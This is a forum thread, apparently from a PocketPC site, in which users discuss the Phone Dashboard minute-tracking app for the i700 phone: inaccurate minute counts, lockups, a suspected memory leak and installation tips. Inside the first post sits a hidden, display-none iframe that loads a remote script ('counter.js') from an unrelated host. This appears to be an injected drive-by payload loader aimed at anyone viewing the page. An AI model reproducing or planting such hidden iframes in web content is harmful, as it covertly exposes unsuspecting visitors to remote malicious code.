Phone Dashboard: Killer App?

Hudson Mobile Phone Dashboard 1.0

Hudson Mobile Link

Finally, a program that will calculate your minute usage on your i700 (or other inferior PocketPC Phone Edition devices )<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I just downloaded the trial version, how do you get it to get your minutes correct from the start???

I called Verizon and from my start date, 29 of each month, to today (10/11) I've used 826 peak... this app is saying 845, which they say is 726 peak and the rest weekend...

I think I'd love this if I can set it set up from the start..
HELP!!

Thanks

A word of caution to those on the AC plan with EN as minutes:

this program will NOT reflect EN minutes, because the i700 internal call log does not reflect them. You can check yourself by hitting the call log key on the phone screen. This is what the program uses to track your usage.

However, this will work great for those on unlimited plan or wireless sync plan.

Phone Dashboard: Killer App?

Main problem I see so far is it counts "#" and "*" calls as part of your plan, e.g. "#225" and "*611" and I see no way to exclude these yet.

Otherwise, Way Cool.

Since I think this is a hot program, you should contact the developers to get things like filtering out specific numbers such as 611, *228, etc., and since they also designed IP Dashboard Network Monitor or (something like that), they can probably incorporate the data portion as well.

Also since most people will pick up this software in the middle of their calling plan, popping in a "starting" value would help.

I actually got a chance to try it out, but I couldn't get the minute usage to increase at all. I was in the middle of testing the trial of Photo Contacts, too, so maybe all these programs are conflicting with each other, perhaps sending AT commands or whatever needs to be done to intercept PocketPC Phone Edition's normal methods.

Any ideas?

Thanks for the advice, Raphael. I basically e-mailed the developers the same message that I posted. Good idea on the starting value. I thought the same myself. The program appears to take it's values from the call log but my call log is missing the start of this month's billing so a manual override on past and present values would be great.

I am finding as you suggest that the more programs I add to my i700 the more messed up it gets. I'd blame PPC PE 2002 rather than the i700. My i700 was very stable until I added AutoStep, then Pocket Informant, ListPro, Pocket Backup Plus, Phone Dashboard, etc. On programs with Today screen plug-ins, too many things seem to be competing for real-time updates. My password screen would lock up (so I removed it!). When I try to configure Phone Dashboard, it has a tendency to lockup my i700, possibly because Pocket Backup with BattMon is busy requesting updates, etc, as I try to return to Today screen. I've now joined everyone else in having to perform at least several soft resets a day whereas with a "naked" i700 hardly ever required a reset.

Anyone know a good utility for monitoring consumption of CPU effort on the i700?

Hi, Dave. I don't attribute Autostep to many soft resets. I'm only running v1.3 at 333 MHz. I noticed more lockups as I added ListPro, Pocket Backup Plus, and finally today with Phone Dashboard, trying to rearrange the order of items on my Today screen, I just got the chance to do my first hard reset! My Pocket Backup Plus .exe file on my SD card rescued me in a few minutes. Well worth the $10 upgrade price from the v1.0 Pocket Backup on the companion CD!

The addition of Phone Dashboard 1.0 has made messing around with the Today screen more prone to soft resets in the few hours I've had it installed.

Phone Dashboard must be installed into the main memory or it will fail big time. That is what happened to me when I installed it onto the backup memory. What a mess it made of things. I contacted the vendor and they told me not to do that, but to install it in main memory. Once I did that, it has been working flawlessly.

I started my trial a couple of days agao, odd that it told me I had 7 days of trial vs 14 or 15 I thought it did.

But any case it is providing me useful info about my minutes use, with text on bold, small font and compact mode its providing me the info I need.

However it doesn't tell me what providers network I am on like the demo picture that shows T-Mobile.

All in all I am finding the stats and ability to track M to M minutes since I get alot of those. Its on my list to purchase with a couple other apps shortly.

Can anyone comment on how to store my data log on my card so that when I do a HR I don't lose all of my minutes and log info like you do after a HR.

Anyone else have problems with this freezing your i700 and having to soft reset a lot while using it?

This happened a lot while I was testing it, but I was never certain it was caused by Phone Dashboard.

Yes... I am having trouble with freezing and with, what appears to be a memory leak. At the end of the day, (or after viewing Usage info in Phone DB) Program RAM usage skyrockets. I've usually got well over 20MB of Program RAM free, but after viewing Options or any Usage details, the phone slows, and eventually freezes.

If you wait long enough, it will come back, but Program RAM usage is still high, and the only way to get it back is a soft reset. I soft reset my i700 at least 5-6 times a day due to this problem with PDB 1.1.

That is interesting. I NEVER have that problem. I wonder why some behave differently than others! The Gremlins must like you better than they like me.

I'm not sure... maybe.

I tried e-mailing them on this, and they treated me like I was stupid and didn't know how to use the app...Its a Today Plug-in fer cryin' out loud. You ain't gotta do much to get it to work.

I **AM** using this, as well as a number of other Today Plug-ins through Snoopsoft Dashboard. However, they're the same ones I use on every other PPC (except for this one because its a PE Plug-In), and have NEVER had a problem like this.

This HAS to be related to Phone Dashboard. However, getting these guys to review their code and check it for memory leaks is going to be like pulling Gator teeth...(at least after my initial experience with them) yer takin' yer life inter yer hands.

When was the last time you ever met someone who has a memory leak jump up to admit it? It is driver error every time!

Chris, I had similar issues, including the lock up and slow performance issues. I wound up getting a refund from Pocket Gear and emailed them last night to see if they have been able to find the issues affecting the I700 and I will post what I get back from them.

Superdave how about an app that can track my minutes used and how about another app that can save my speed dial settings and restore them?
